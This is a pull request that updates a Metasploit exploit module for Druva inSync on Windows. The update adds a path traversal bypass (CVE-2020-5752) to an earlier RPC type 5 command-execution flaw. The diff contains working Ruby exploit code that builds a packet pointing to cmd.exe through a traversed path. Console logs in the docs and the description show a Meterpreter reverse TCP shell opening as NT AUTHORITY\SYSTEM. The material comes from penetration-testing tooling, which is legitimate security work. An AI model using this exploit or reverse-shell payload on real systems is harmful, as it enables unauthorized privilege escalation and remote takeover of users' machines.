### PR TITLE
Use CVE-2020-5752 path traversal bypass for CVE-2019-3999

### DIFF
--- a/documentation/modules/exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.md
+++ b/documentation/modules/exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.md
@@ -1,16 +1,18 @@
 ## Vulnerable Application
 
-  Druva inSync client for Windows exposes a network service on TCP port
-  6064 on the local network interface. inSync versions 6.5.2 and prior
-  do not validate user-supplied program paths in RPC type 5 messages,
-  allowing execution of arbitrary commands as SYSTEM.
+Druva inSync client for Windows exposes a network service on TCP
+port 6064 on the local network interface. inSync versions 6.6.3
+and prior do not properly validate user-supplied program paths
+in RPC type 5 messages, allowing execution of arbitrary commands
+as SYSTEM.
 
-  This module has been tested successfully on inSync version
-  6.5.2r99097 on Windows 7 SP1 (x64).
+This module has been tested successfully on inSync versions
+6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).
 
-  Download:
+Download:
 
-  * https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
+* https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
+* https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi
 
 
 ## Verification Steps
@@ -33,32 +35,35 @@
 
 ## Scenarios
 
-### Windows 7 SP1 (x64)
+### Druva inSync6.6.3r102156 on Windows 7 SP1 (x64)
 
-  ```
-  msf5 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc 
-  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
-  session => 1
-  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
-  lhost => 172.16.191.165
-  msf5 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run
+```
+msf6 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
+session => 1
+msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run
 
-  [*] Started reverse TCP handler on 172.16.191.165:4444 
-  [*] Connecting to 127.0.0.1:6064 ...
-  [*] Sending packet (122 bytes) to 127.0.0.1:6064 ...
-  [*] Sending stage (176195 bytes) to 172.16.191.242
-  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.242:49337) at 2020-04-30 22:01:05 -0400
-  
-  meterpreter > getuid
-  Server username: NT AUTHORITY\SYSTEM
-  meterpreter > sysinfo 
-  Computer        : TEST
-  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
-  Architecture    : x64
-  System Language : en_US
-  Domain          : WORKGROUP
-  Logged On Users : 2
-  Meterpreter     : x86/windows
-  meterpreter > 
-  ```
+[*] Started reverse TCP handler on 172.16.191.165:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. Service 'inSyncCPHService' exists.
+[*] Connecting to 127.0.0.1:6064 ...
+[*] Sending packet (258 bytes) to 127.0.0.1:6064 ...
+[*] Sending stage (175174 bytes) to 172.16.191.171
+[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.171:49520) at 2020-12-10 07:03:04 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : TEST
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
 

--- a/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb
+++ b/modules/exploits/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc.rb
@@ -11,6 +11,7 @@ class MetasploitModule < Msf::Exploit::Local
   include Post::Windows::Services
   include Exploit::EXE
   include Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -19,26 +20,36 @@ class MetasploitModule < Msf::Exploit::Local
         {
           'Name' => 'Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation',
           'Description' => %q{
-            Druva inSync client for Windows exposes a network service on TCP port
-            6064 on the local network interface. inSync versions 6.5.2 and prior
-            do not validate user-supplied program paths in RPC type 5 messages,
-            allowing execution of arbitrary commands as SYSTEM.
-            This module has been tested successfully on inSync version
-            6.5.2r99097 on Windows 7 SP1 (x64).
+            Druva inSync client for Windows exposes a network service on TCP
+            port 6064 on the local network interface. inSync versions 6.6.3
+            and prior do not properly validate user-supplied program paths
+            in RPC type 5 messages, allowing execution of arbitrary commands
+            as SYSTEM.
+
+            This module has been tested successfully on inSync versions
+            6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).
           },
           'License' => MSF_LICENSE,
           'Author' =>
           [
-            'Chris Lyne', # Discovery and Python exploit (@lynerc)
+            'Chris Lyne', # (@lynerc) Discovery and exploit (CVE-2019-3999); discovery of traversal bypass (CVE-2020-5752) for CVE-2019-3999 patch.
+            'Matteo Malvica', # Duplicate independent discovery of traversal bypass (CVE-2020-5752)
             'bcoles' # Metasploit
           ],
           'References' =>
           [
             ['CVE', '2019-3999'],
+            ['CVE', '2020-5752'],
             ['EDB', '48400'],
+            ['EDB', '48505'],
+            ['EDB', '49211'],
             ['PACKETSTORM', '157493'],
+            ['PACKETSTORM', '157802'],
+            ['PACKETSTORM', '160404'],
             ['URL', 'https://www.tenable.com/security/research/tra-2020-12'],
+            ['URL', 'https://www.tenable.com/security/research/tra-2020-34'],
             ['URL', 'https://github.com/tenable/poc/blob/master/druva/inSync/druva_win_cphwnet64.py'],
+            ['URL', 'https://www.matteomalvica.com/blog/2020/05/21/lpe-path-traversal/'],
           ],
           'Platform' =>
           [
@@ -91,25 +102,10 @@ class MetasploitModule < Msf::Exploit::Local
     datastore['WritableDir'].blank? ? session.sys.config.getenv('TEMP') : datastore['WritableDir'].to_s
   end
 
-  def service_exists?(service)
-    srv_info = service_info(service)
-
-    if srv_info.nil?
-      vprint_warning('Unable to enumerate Windows services')
-      return false
-    end
-
-    if srv_info && srv_info[:display].empty?
-      return false
-    end
-
-    true
-  end
-
   def execute_command(host, port, command)
     header = 'inSync PHC RPCW[v0002]'
     rpc_type = [5].pack('V')
-    cmd = command.force_encoding('UTF-8').unpack('U*').pack('v*')
+    cmd = "C:\\ProgramData\\Druva\\inSync4\\..\\..\\..\\Windows\\System32\\cmd.exe /c \"#{command}\"".force_encoding('UTF-8').unpack('U*').pack('v*')
 
     pkt = header
     pkt << rpc_type
@@ -153,17 +149,13 @@ class MetasploitModule < Msf::Exploit::Local
     service = 'inSyncCPHService'
 
     unless service_exists?(service)
-      return CheckCode::Safe("Service '#{service}' does not exist")
+      return CheckCode::Safe("Service '#{service}' does not exist.")
     end
 
-    CheckCode::Detected("Service '#{service}' exists")
+    CheckCode::Detected("Service '#{service}' exists.")
   end
 
   def exploit
-    unless check == CheckCode::Detected
-      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
-    end
-
     if is_system?
       fail_with(Failure::BadConfig, 'Session already has SYSTEM privileges')
     end


### PR DESCRIPTION
Update Druva inSync inSyncCPHwnet64.exe RPC Type 5 Privilege Escalation module to use CVE-2020-5752 path traversal bypass for CVE-2019-3999.

## Vulnerable Application

Druva inSync client for Windows exposes a network service on TCP
port 6064 on the local network interface. inSync versions 6.6.3
and prior do not properly validate user-supplied program paths
in RPC type 5 messages, allowing execution of arbitrary commands
as SYSTEM.

This module has been tested successfully on inSync versions
6.5.2r99097 and 6.6.3r102156 on Windows 7 SP1 (x64).

Download:

* https://downloads.druva.com/downloads/inSync/Windows/6.5.2/inSync6.5.2r99097.msi
* https://downloads.druva.com/downloads/inSync/Windows/6.6.3/inSync6.6.3r102156.msi


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc`
  4. `set SESSION <SESSION>`
  5. `check`
  6. `run`
  7. You should get a new *SYSTEM* session


## Options

  ### WritableDir

  A writable directory file system path. (default: `%TEMP%`)


## Scenarios

### Druva inSync6.6.3r102156 on Windows 7 SP1 (x64)

```
msf6 > use exploit/windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set session 1
session => 1
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(windows/local/druva_insync_insynccphwnet64_rcp_type_5_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. Service 'inSyncCPHService' exists.
[*] Connecting to 127.0.0.1:6064 ...
[*] Sending packet (258 bytes) to 127.0.0.1:6064 ...
[*] Sending stage (175174 bytes) to 172.16.191.171
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.171:49520) at 2020-12-10 07:03:04 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : TEST
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
```

